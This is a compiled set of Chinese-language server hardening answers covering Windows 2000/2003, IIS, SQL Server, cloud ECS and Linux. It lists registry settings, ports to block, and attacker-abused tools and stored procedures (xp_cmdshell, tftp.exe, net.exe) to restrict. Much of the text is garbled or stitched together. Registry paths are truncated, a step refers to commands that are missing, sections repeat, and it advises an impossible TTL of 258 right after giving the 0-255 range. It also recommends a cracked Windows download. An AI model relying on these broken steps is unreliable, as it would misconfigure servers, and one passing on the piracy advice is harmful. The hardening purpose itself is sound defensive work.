可以修改注冊表實現完全隱藏： 「HKEY_LOCAL_-VersionExplorerAdvancedFol derHi-ddenSHOWALL」，滑鼠右擊「CheckedValue」，選擇修改，把數值由1改為0

4、防止SYN洪水攻擊

HKEY_LOCAL_ 新建DWORD 值，名為SynAttackProtect，值為2

5、 禁止響應ICMP路由通告報文

HKEY_LOCAL_Interfacesinterface 新建DWORD值，名為PerformRouterDiscovery 值為0

6. 防止ICMP重定向報文的攻擊

HKEY_LOCAL_ 將EnableICMPRedirects 值設為0

7、 不支持IGMP協議

HKEY_LOCAL_ 新建DWORD 值，名為IGMPLevel 值為0

8、禁用DCOM：運行中輸入 Dcomcnfg.exe。 回車， 單擊「控制台根節點」下的「組件服務」。 打開「計算機」子 文件夾。

對於本地計算機，請以右鍵單擊「我的電腦」，然後選擇「屬 性」。選擇「默認屬性」選項卡。清除「在這台計算機上啟用分布式 COM」復選框。

9、終端服務的默認埠為3389，可考慮修改為別的埠。

修改方法為： 伺服器端：打開注冊表，在「HKLM\SYSTEM\Current ControlSet\Control\Terminal Server\Win Stations」 處找到類似RDP-TCP的子鍵，修改PortNumber值。 客戶端：按正常步驟建一個客戶端連接，選中這個連接，在「文件」菜單中選擇導出，在指定位置會 生成一個後綴為.cns的文件。打開該文件，修改「Server Port」值為與伺服器端的PortNumber對應的 值。然後再導入該文件（方法：菜單→文件→導入），這樣客戶端就修改了埠。

6）、配置 IIS 服務

1、不使用默認的Web站點，如果使用也要將 將IIS目錄與系統磁碟分開。

2、刪除IIS默認創建的Inetpub目錄（在安裝系統的盤上）。

3、刪除系統盤下的虛擬目錄，如：_vti_bin、IISSamples、Scripts、IIShelp、IISAdmin、IIShelp、 MSADC。

4、刪除不必要的IIS擴展名映射。 右鍵單擊「默認Web站點→屬性→主目錄→配置」，打開應用程序窗口，去掉不必要的應用程序映 射。主要為.shtml, .shtm, .stm

5、更改IIS日誌的路徑 右鍵單擊「默認Web站點→屬性-網站-在啟用日誌記錄下點擊屬性

6、如果使用的是2000可以使用iislockdown來保護IIS，在2003運行的IE6.0的版本不需要。

7、使用UrlScan

UrlScan是一個ISAPI篩選器，它對傳入的HTTP數據包進行分析並可以拒絕任何可疑的通信量。 目前最新的版本是2.5，如果是2000Server需要先安裝1.0或2.0的版本。 如果沒有特殊的要求採用UrlScan默認配置就可以了。 但如果你在伺服器運行ASP.NET程序，並要進行調試你需打開要 %WINDIR%System32InetsrvURLscan，文件夾中的URLScan.ini 文件，然後在UserAllowVerbs節添 加debug謂詞，注意此節是區分大小寫的。 如果你的網頁是.asp網頁你需要在DenyExtensions刪除.asp相關的內容。 如果你的網頁使用了非ASCII代碼，你需要在Option節中將AllowHighBitCharacters的值設為1 在對URLScan.ini 文件做了更改後，你需要重啟IIS服務才能生效，快速方法運行中輸入iisreset 如果你在配置後出現什麼問題，你可以通過添加/刪除程序刪除UrlScan。

8、利用WIS (Web Injection Scanner)工具對整個網站進行SQL Injection 脆弱性掃描.

7）、配置Sql伺服器

1、System Administrators 角色最好不要超過兩個

3、不要使用Sa賬戶，為其配置一個超級復雜的密碼

4、刪除以下的擴展存儲過程格式為：

use master sp_dropextendedproc '擴展存儲過程名'

xp_cmdshell：是進入操作系統的最佳捷徑，刪除 訪問注冊表的存儲過程，

刪除

Xp_regaddmultistring Xp_regdeletekey Xp_regdeletevalue Xp_regenumvalues Xp_regread Xp_regwrite Xp_regremovemultistring

OLE自動存儲過程，不需要刪除

Sp_OACreate Sp_OADestroy Sp_OAGetErrorInfo Sp_OAGetProperty Sp_OAMethod Sp_OASetProperty Sp_OAStop

5、隱藏 SQL Server、更改默認的1433埠

右擊實例選屬性-常規-網路配置中選擇TCP/IP協議的屬性，選擇隱藏 SQL Server 實例，並改原默 認的1433埠。

8）、修改系統日誌保存地址 默認位置為 應用程序日誌、安全日誌、系統日誌、DNS日誌默認位置：%systemroot%\system32\config，默認 文件大小512KB，管理員都會改變這個默認大小。

安全日誌文件：%systemroot%\system32\config\SecEvent.EVT 系統日誌文件：%systemroot%\system32\config\SysEvent.EVT 應用程序日誌文件：%systemroot%\system32\config\AppEvent.EVT Internet信息服務FTP日誌默認位置：%systemroot%\system32\logfiles\msftpsvc1\，默認每天一個日 志 Internet信息服務WWW日誌默認位置：%systemroot%\system32\logfiles\w3svc1\，默認每天一個日 志 Scheler(任務計劃)服務日誌默認位置：%systemroot%\schedlgu.txt 應用程序日誌，安全日誌，系統日誌，DNS伺服器日誌，它們這些LOG文件在注冊表中的： HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Eventlog Schedluler(任務計劃)服務日誌在注冊表中 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SchelingAgent SQL 刪掉或改名xplog70.dll [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters] "AutoShareServer"=dword:00000000 "AutoShareWks"=dword:00000000 // AutoShareWks 對pro版本 // AutoShareServer 對server版本 // 0

禁止管理共享admin$,c$,d$之類默認共享 [HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\LSA] "restrictanonymous"=dword:00000001 //0x1 匿名用戶無法列舉本機用戶列表 //0x2 匿名用戶無法連接本機IPC$共享(可能sql server不能夠啟動

9）、本地安全策略

1．只開放服務需要的埠與協議。 具體方法為：按順序打開「網上鄰居→屬性→本地連接→屬性→Internet 協議→屬性→高級→選項→ TCP/IP篩選→屬性」，添加需要的TCP、UDP埠以及IP協議即可。根據服務開設口，常用的TCP 口有：80口用於Web服務；21用於FTP服務；25口用於SMTP；23口用於Telnet服務；110口 用於POP3。常用的UDP埠有：53口－DNS域名解析服務；161口－snmp簡單的網路管理協議。 8000、4000用於OICQ，伺服器用8000來接收信息，客戶端用4000發送信息。 封TCP埠: 21(FTP,換FTP埠)23(TELNET),53(DNS),135,136,137,138,139,443,445,1028,1433,3389 可封TCP埠:1080,3128,6588,8080(以上為代理埠).25(SMTP),161(SNMP),67(引導) 封UDP埠:1434(這個就不用說了吧) 封所有ICMP,即封PING 以上是最常被掃的埠,有別的同樣也封,當然因為80是做WEB用的

2、禁止建立空連接 默認情況下，任何用戶可通過空連接連上伺服器，枚舉賬號並猜測密碼。空連接用的埠是139， 通過空連接，可以復制文件到遠端伺服器，計劃執行一個任務，這就是一個漏洞。可以通過以下兩 種方法禁止建立空連接：

（1） 修改注冊表中 Local_Machine\System\ CurrentControlSet\Control\LSA-RestrictAnonymous 的值為1。

（2） 修改Windows 2000的本地安全策略。設置「本地安全策略→本地策略→選項」中的 RestrictAnonymous（匿名連接的額外限制）為「不容許枚舉SAM賬號和共享」。 首先，Windows 2000的默認安裝允許任何用戶通過空連接得到系統所有賬號和共享列表，這本來 是為了方便區域網用戶共享資源和文件的，但是，同時任何一個遠程用戶也可以通過同樣的方法得 到您的用戶列表，並可能使用暴力法破解用戶密碼給整個網路帶來破壞。很多人都只知道更改注冊 表Local_Machine\System\CurrentControlSet\Control\LSA-RestrictAnonymous = 1來禁止空用戶連接， 實際上Windows 2000的本地安全策略里（如果是域伺服器就是在域伺服器安全和域安全策略里） 就有RestrictAnonymous選項，其中有三個值：「0」這個值是系統默認的，沒有任何限制，遠程用戶 可以知道您機器上所有的賬號、組信息、共享目錄、網路傳輸列表(NetServerTransportEnum)等；「1」 這個值是只允許非NULL用戶存取SAM賬號信息和共享信息；「2」這個值只有Windows 2000才支 持，需要注意的是，如果使用了這個值，就不能再共享資源了，所以還是推薦把數值設為「1」比較 好。

10)、防止asp木馬

1、基於FileSystemObject組件的asp木馬

cacls %systemroot%\system32\scrrun.dll /e /d guests //禁止guests使用 regsvr32 scrrun.dll /u /s //刪除

2．基於shell.application組件的asp木馬

cacls %systemroot%\system32\shell32.dll /e /d guests //禁止guests使用 regsvr32 shell32.dll /u /s //刪除

3．將圖片文件夾的許可權設置為不允許運行。

4.如果網站中不存在有asp的話，禁用asp

11）、防止SQL注入

1．盡量使用參數化語句

2．無法使用參數化的SQL使用過濾。

3．網站設置為不顯示詳細錯誤信息，頁面出錯時一律跳轉到錯誤頁面。

4.不要使用sa用戶連接資料庫

5、新建一個public許可權資料庫用戶，並用這個用戶訪問資料庫 6、[角色]去掉角色public對sysobjects與syscolumns對象的select訪問許可權

最後強調一下，以上設置可能會影響到有些應用服務，例如導至不能連接上遠程伺服器，

因此強烈建議，以上設置首先在本地機器或虛擬機(VMware Workstation)上做好設置，確定沒事之後然後再在伺服器上做。

『伍』 如何配置網路伺服器安全

配置網路伺服器安全一般需要做以下步驟：
1、安裝補丁程序任何操作系統都有漏洞，作為網路系統管理員就有責任及時地將「補
丁」打上，安裝最新的升級包。
2、安裝和設置防火牆現在有許多基於硬體或軟體的防火牆，如華為、
神州數碼、聯想、瑞星等廠商的產品。對於企業內部網來說，安裝防火牆是非常必要的。防火牆對於非法訪問具有很好的預防作用，但是並不是安裝了防火牆之後就
萬事大吉了，而是需要進行適當的設置才能起作用。如果對防火牆的設置不了解，需要請技術支持人員協助設置。
3、安裝網路殺毒軟體現在網路上
的病毒非常猖獗，這就需要在網路伺服器上安裝網路版的殺毒軟體來控制病毒的傳播，目前，大多數反病毒廠商(如瑞星、冠群金辰、趨勢、賽門鐵克、熊貓等)都
已經推出了網路版的殺毒軟體。同時，在網路版的殺毒軟體使用中，必須要定期或及時升級殺毒軟體。
4、賬號和密碼保護賬號和密碼保護可以說是系統的第一道防線，目前網上
的大部分對系統的攻擊都是從截獲或猜測密碼開始的。一旦黑客進入了系統，那麼前面的防衛措施幾乎就沒有作用，所以對伺服器系統管理員的賬號和密碼進行管理
是保證系統安全非常重要的措施。
5、監測系統日誌通過運行系統日誌程序，系統會記錄下所有用戶使用系統的情形，包括最近登錄時間、使用的賬號、進行的活動
等。日誌程序會定期生成報表，通過對報表進行分析，你可以知道是否有異常現象。
6、關閉不需要的服務和埠伺服器操作系統在安裝的時候，會啟動一些不
需要的服務，這樣會佔用系統的資源，而且也增加了系統的安全隱患。對於假期期間完全不用的伺服器，可以完全關閉;對於假期期間要使用的伺服器，應關閉不需
要的服務，如Telnet等。另外，還要關掉沒有必要開的TCP埠。
7、定期對伺服器進行備份為防止不能預料的系統故障或用戶不小心的非法操作，必須對
系統進行安全備份。除了對全系統進行每月一次的備份外，還應對修改過的數據進行每周一次的備份。
8、如果伺服器與客戶端傳輸的數據都比較敏感，例如涉及到金錢交易的網站，那很有必要安裝一個SSL證書，去易維信-EVTrust 申請一個SSL證書，使網站實現"https"加密傳輸。

『陸』 阿里雲ecs伺服器怎麼設置更安全

雲伺服器的安全安全設置主要有一下幾個比較重要的幾個方面：

1、首先是伺服器的用戶管理，很多的攻擊和破解，首先是針對於系統的遠程登錄，畢竟拿到登錄用戶之後就能進入系統進行操作，所以首先要做的就是禁止root超級用戶的遠程登錄。

2、把ssh的默認埠改為其他不常用的埠。你可能不知道我們的伺服器其實每天都在被很多的掃描工具在掃描著，尤其是對於Linux伺服器的ssh默認22埠，掃描工具掃描出22埠之後就可能會嘗試破解和登錄。把ssh的默認埠修改後可以減少被掃描和暴力登錄的概率。此外你還可以使用fail2ban等程序防止ssh被暴力破解，其原理是嘗試多少次登錄失敗之後就把那個IP給禁止登錄了。

3、SSH 改成使用密鑰登錄，這樣子就不必擔心暴力破解了，因為對方不可能有你的密鑰，比密碼登錄安全多了。

4、一定要定期檢查和升級你的網站程序以及相關組件，及時修復那些重大的已知漏洞。網上也有很多的爬蟲機器人每天在掃描著各式各樣的網站，嘗試找系統漏洞。即使你前面把伺服器用戶許可權管理、登錄防護都做得很好了，然而還是有可能在網站程序上被破解入侵。

5、另外如果雲伺服器上運行多個網站系統(博客+企業官網)。我推薦使用docker容器的方式隔離運行環境，將每個程序運行在一個單獨的容器里，這樣即使伺服器上其中的一個網站程序被破解入侵了，也會被限制在被入侵的容器內，不會影響到其他的容器，也不會影響到系統本身。

『柒』 如何保證Linux伺服器的安全

一、更新伺服器。

『捌』 怎麼才能使linux伺服器安全

一、系統安全記錄文件

操作系統內部的記錄文件是檢測是否有網路入侵的重要線索。如果您的系統是直接連到Internet，您發現有很多人對您的系統做Telnet/FTP登錄嘗試，可以運行「#more /var/log/secure grep refused」來檢查系統所受到的攻擊，以便採取相應的對策，如使用SSH來替換Telnet/rlogin等。

二、啟動和登錄安全性

1．BIOS安全IXPUB

設置BIOS密碼且修改引導次序禁止從軟盤啟動系統。

2．用戶口令

用戶口令是Linux安全的一個基本起點，很多人使用的用戶口令過於簡單，這等於給侵入者敞開了大門，雖然從理論上說，只要有足夠的時間和資源可以利用，就沒有不能破解的用戶口令，但選取得當的口令是難於破解的。較好的用戶口令是那些只有他自己容易記得並理解的一串字元，並且絕對不要在任何地方寫出來。

3．默認賬號

應該禁止所有默認的被操作系統本身啟動的並且不必要的賬號，當您第一次安裝系統時就應該這么做，Linux提供了很多默認賬號，而賬號越多，系統就越容易受到攻擊。

可以用下面的命令刪除賬號。

〔root@server /〕# userdel 用戶名

或者用以下的命令刪除組用戶賬號。

〔root@server /〕# groupdel username

4．口令文件

chattr命令給下面的文件加上不可更改屬性，從而防止非授權用戶獲得許可權。

〔root@server /〕# chattr +i /etc/passwd

〔root@server /〕# chattr +i /etc/shadow

〔root@server /〕# chattr +i /etc/group

〔root@server /〕# chattr +i /etc/gshadow

5．禁止Ctrl+Alt+Delete重新啟動機器命令

6．限制su命令

如果您不想任何人能夠su作為root，可以編輯/etc/pam.d/su文件，增加如下兩行：

auth sufficient /lib/security/pam_rootok.so debug

auth required /lib/security/pam_wheel.so group=isd

這時，僅isd組的用戶可以su作為root。此後，如果您希望用戶admin能夠su作為root，可以運行如下命令：

〔root@server /〕# usermod -G10 admin

7．刪減登錄信息

默認情況下，登錄提示信息包括Linux發行版、內核版本名和伺服器主機名等。對於一台安全性要求較高的機器來說這樣泄漏了過多的信息。可以編輯/etc/rc.d/rc.local將輸出系統信息的如下行注釋掉。
三、限制網路訪問

1．NFS訪問如果您使用NFS網路文件系統服務，應該確保您的/etc/exports具有最嚴格的訪問許可權設置，也就是意味著不要使用任何通配符、不允許root寫許可權並且只能安裝為只讀文件系統。
2．Inetd設置

首先要確認/etc/inetd.conf的所有者是root，且文件許可權設置為600。設置完成後，可以使用「stat」命令進行檢查。

3．登錄終端設置

4．避免顯示系統和版本信息。

5.不允許root用戶登錄伺服器

四、防止攻擊

1．阻止ping 如果沒人能ping通您的系統，安全性自然增加了。

2．防止IP欺騙

3．防止DoS攻擊

上面的命令禁止調試文件，限制進程數為50並且限制內存使用為5MB。

『玖』 IBM伺服器如何進入安全模式

IBM伺服器進入安全模式可嘗試如下方法：
1、windows下 運行命令msconfig 。
2、然後點BOOT.INI 在啟動選項中 ，選第一個打勾 /safeboot 其它不要動 。
3、選好重啟就自動進了安全模式 進正常系統的話，就再在安全模式中把那個勾去掉 即可。

『拾』 關於2003伺服器的安全設置

windows server2003是目前最為成熟的網路伺服器平台，安全性相對於windows 2000有大大的提高,但是2003默認的安全配置不一定適合我們的需要，所以，我們要根據實際情況來對win2003進行全面安全配置。說實話，安全配置是一項比較有難度的網路技術，許可權配置的太嚴格，好多程序又運行不起，許可權配置的太松，又很容易被黑客入侵，做為網路管理員，真的很頭痛，因此，我結合這幾年的網路安全管理經驗，總結出以下一些方法來提高我們伺服器的安全性。

第一招：正確劃分文件系統格式，選擇穩定的操作系統安裝盤

為了提高安全性，伺服器的文件系統格式一定要劃分成NTFS（新技術文件系統）格式，它比FAT16、FAT32的安全性、空間利用率都大大的提高，我們可以通過它來配置文件的安全性，磁碟配額、EPS文件加密等。如果你已經分成FAT32的格式了，可以用CONVERT 盤符 /FS：NTFS /V 來把FAT32轉換成NTFS格式。正確安裝windows 2003 server,在網安聯盟http://cqhk.14023.com/Soft/yyrj/bigsoft/200504/502.asp>有windows 2003的企業可升級版，這個一個完全破解了的版本，可以直接網上升級,我們安裝時盡量只安裝我們必須要用的組件，安裝完後打上最新的補丁，到網上升級到最新版本！保證操作系統本身無漏洞。

第二招：正確設置磁碟的安全性,具體如下(虛擬機的安全設置，我們以asp程序為例子)重點：

1、系統盤許可權設置

C:分區部分：

c:\

administrators 全部(該文件夾，子文件夾及文件)

CREATOR OWNER 全部(只有子文件來及文件)

system 全部(該文件夾，子文件夾及文件)

IIS_WPG 創建文件/寫入數據(只有該文件夾)

IIS_WPG(該文件夾，子文件夾及文件)

遍歷文件夾/運行文件

列出文件夾/讀取數據

讀取屬性

創建文件夾/附加數據

讀取許可權

c:\Documents and Settings

administrators 全部(該文件夾，子文件夾及文件)

Power Users (該文件夾，子文件夾及文件)

讀取和運行

列出文件夾目錄

讀取

SYSTEM全部(該文件夾，子文件夾及文件)

C:\Program Files

administrators 全部(該文件夾，子文件夾及文件)

CREATOR OWNER全部(只有子文件來及文件)

IIS_WPG (該文件夾，子文件夾及文件)

讀取和運行

列出文件夾目錄

讀取

Power Users(該文件夾，子文件夾及文件)

修改許可權

SYSTEM全部(該文件夾，子文件夾及文件)

TERMINAL SERVER USER (該文件夾，子文件夾及文件)

修改許可權

2、網站及虛擬機許可權設置(比如網站在E盤)

說明：我們假設網站全部在E盤wwwsite目錄下，並且為每一個虛擬機創建了一個guest用戶，用戶名為vhost1...vhostn並且創建了一個webuser組，把所有的vhost用戶全部加入這個webuser組裡面方便管理

E:\

Administrators全部(該文件夾，子文件夾及文件)

E:\wwwsite

Administrators全部(該文件夾，子文件夾及文件)

system全部(該文件夾，子文件夾及文件)

service全部(該文件夾，子文件夾及文件)

E:\wwwsite\vhost1

Administrators全部(該文件夾，子文件夾及文件)

system全部(該文件夾，子文件夾及文件)

vhost1全部(該文件夾，子文件夾及文件)

3、數據備份盤

數據備份盤最好只指定一個特定的用戶對它有完全操作的許可權

比如F盤為數據備份盤，我們只指定一個管理員對它有完全操作的許可權

4、其它地方的許可權設置

請找到c盤的這些文件，把安全性設置只有特定的管理員有完全操作許可權

下列這些文件只允許administrators訪問

net.exe

net1.exet

cmd.exe

tftp.exe

netstat.exe

regedit.exe

at.exe

attrib.exe

cacls.exe

format.com

5.刪除c:\inetpub目錄，刪除iis不必要的映射，建立陷阱帳號，更改描述

第三招：禁用不必要的服務，提高安全性和系統效率

Computer Browser 維護網路上計算機的最新列表以及提供這個列表

Task scheler 允許程序在指定時間運行

Routing and Remote Access 在區域網以及廣域網環境中為企業提供路由服務

Removable storage 管理可移動媒體、驅動程序和庫

Remote Registry Service 允許遠程注冊表操作

Print Spooler 將文件載入到內存中以便以後列印。要用列印機的朋友不能禁用這項

IPSEC Policy Agent 管理IP安全策略以及啟動ISAKMP/OakleyIKE)和IP安全驅動程序

Distributed Link Tracking Client 當文件在網路域的NTFS卷中移動時發送通知

Com+ Event System 提供事件的自動發布到訂閱COM組件

Alerter 通知選定的用戶和計算機管理警報

Error Reporting Service 收集、存儲和向 Microsoft 報告異常應用程序

Messenger 傳輸客戶端和伺服器之間的 NET SEND 和 警報器服務消息

Telnet 允許遠程用戶登錄到此計算機並運行程序

第四招:修改注冊表，讓系統更強壯

1、隱藏重要文件/目錄可以修改注冊表實現完全隱藏：HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\ Current-Version\Explorer\Advanced\Folder\Hi-dden\SHOWALL」，滑鼠右擊 「CheckedValue」，選擇修改，把數值由1改為0

2、啟動系統自帶的Internet連接_blank">防火牆，在設置服務選項中勾選Web伺服器。

3、防止SYN洪水攻擊

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters

新建DWORD值，名為SynAttackProtect，值為2

EnablePMTUDiscovery REG_DWORD 0

NoNameReleaseOnDemand REG_DWORD 1

EnableDeadGWDetect REG_DWORD 0

KeepAliveTime REG_DWORD 300,000

PerformRouterDiscovery REG_DWORD 0

EnableICMPRedirects REG_DWORD 0

4. 禁止響應ICMP路由通告報文

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\interface

新建DWORD值，名為PerformRouterDiscovery 值為0

5. 防止ICMP重定向報文的攻擊

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters

將EnableICMPRedirects 值設為0

6. 不支持IGMP協議

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters

新建DWORD值，名為IGMPLevel 值為0

7.修改終端服務埠

運行regedit，找到[HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ Terminal Server \ Wds \ rdpwd \ Tds \ tcp]，看到右邊的PortNumber了嗎？在十進制狀態下改成你想要的埠號吧，比如7126之類的，只要不與其它沖突即可。

2、第二處HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ Terminal Server \ WinStations \ RDP-Tcp，方法同上，記得改的埠號和上面改的一樣就行了。

8、禁止IPC空連接：

cracker可以利用net use命令建立空連接，進而入侵，還有net view，nbtstat這些都是基於空連接的，禁止空連接就好了。打開注冊表，找到Local_Machine\System\CurrentControlSet\Control\LSA-RestrictAnonymous 把這個值改成」1」即可。

9、更改TTL值

cracker可以根據ping回的TTL值來大致判斷你的操作系統，如：

TTL=107(WINNT);

TTL=108(win2000);

TTL=127或128(win9x);

TTL=240或241(linux);

TTL=252(solaris);

TTL=240(Irix);

實際上你可以自己更改的：HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters：DefaultTTL REG_DWORD 0-0xff(0-255 十進制,默認值128)改成一個莫名其妙的數字如258，起碼讓那些小菜鳥暈上半天，就此放棄入侵你也不一定哦

10. 刪除默認共享
有人問過我一開機就共享所有盤，改回來以後，重啟又變成了共享是怎麼回事，這是2K為管理而設置的默認共享，必須通過修改注冊表的方式取消它：HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters：AutoShareServer類型是REG_DWORD把值改為0即可

11. 禁止建立空連接

默認情況下，任何用戶通過通過空連接連上伺服器，進而枚舉出帳號，猜測密碼。我們可以通過修改注冊表來禁止建立空連接：

Local_Machine\System\CurrentControlSet\Control\LSA-RestrictAnonymous 的值改成」1」即可。

第五招:其它安全手段

1.禁用TCP/IP上的NetBIOS
網上鄰居-屬性-本地連接-屬性-Internet協議（TCP/IP）屬性-高級-WINS面板-NetBIOS設置-禁用TCP/IP上的NetBIOS。這樣cracker就無法用nbtstat命令來讀取你的NetBIOS信息和網卡MAC地址了。

2. 賬戶安全
首先禁止一切賬戶，除了你自己，呵呵。然後把Administrator改名。我呢就順手又建了個Administrator賬戶，不過是什麼許可權都沒有的那種，然後打開記事本，一陣亂敲，復制，粘貼到「密碼」里去，呵呵，來破密碼吧~！破完了才發現是個低級賬戶，看你崩潰不？

創建2個管理員用帳號

雖然這點看上去和上面這點有些矛盾，但事實上是服從上面的規則的。 創建一個一般許可權帳號用來收信以及處理一些*常事物，另一個擁有Administrators 許可權的帳戶只在需要的時候使用。可以讓管理員使用 「 RunAS」 命令來執行一些需要特權才能作的一些工作，以方便管理

3.更改C:\WINDOWS\Help\iisHelp\common\404b.htm內容改為<META HTTP-EQUIV=REFRESH CONTENT="0;URL=/;">這樣，出錯了自動轉到首頁

4. 安全日誌

我遇到過這樣的情況，一台主機被別人入侵了，系統管理員請我去追查兇手，我登錄進去一看：安全日誌是空的，倒，請記住：Win2000的默認安裝是不開任何安全審核的！那麼請你到本地安全策略->審核策略中打開相應的審核，推薦的審核是：

賬戶管理 成功 失敗

登錄事件 成功 失敗

對象訪問 失敗

策略更改 成功 失敗

特權使用 失敗

系統事件 成功 失敗

目錄服務訪問 失敗

賬戶登錄事件 成功 失敗

審核項目少的缺點是萬一你想看發現沒有記錄那就一點都沒轍；審核項目太多不僅會佔用系統資源而且會導致你根本沒空去看，這樣就失去了審核的意義

5. 運行防毒軟體

我見過的Win2000/Nt伺服器從來沒有見到有安裝了防毒軟體的，其實這一點非常重要。一些好的殺毒軟體不僅能殺掉一些著名的病毒，還能查殺大量木馬和後門程序。這樣的話，「黑客」們使用的那些有名的木馬就毫無用武之地了。不要忘了經常升級病毒庫,我們推薦mcafree殺毒軟體+blackice_blank">防火牆

6.sqlserver資料庫伺服器安全和serv-u ftp伺服器安全配置，更改默認埠，和管理密碼

7.設置ip篩選、用blackice禁止木馬常用埠

一般禁用以下埠

135 138 139 443 445 4000 4899 7626

8.本地安全策略和組策略的設置,如果你在設置本地安全策略時設置錯了，可以這樣恢復成它的默認值.

打開 %SystemRoot%\Security文件夾,創建一個 "OldSecurity"子目錄,將%SystemRoot%\Security下所有的.log文件移到這個新建的子文件夾中.

在%SystemRoot%\Security\database\下找到"Secedit.sdb"安全資料庫並將其改名,如改為"Secedit.old".

啟動"安全配置和分析"MMC管理單元:"開始"->"運行"->"MMC",啟動管理控制台,"添加/刪除管理單元",將"安全配置和分析"管理單元添加上.

右擊"安全配置和分析"->"打開資料庫",瀏覽"C:\WINNT\security\Database"文件夾,輸入文件名"secedit.sdb",單擊"打開".

當系統提示輸入一個模板時,選擇"Setup Security.inf",單擊"打開".

如果系統提示"拒絕訪問資料庫",不管他.

你會發現在"C:\WINNT\security\Database"子文件夾中重新生成了新的安全資料庫,在"C:\WINNT\security"子文件夾下重新生成了log文件.安全資料庫重建成功.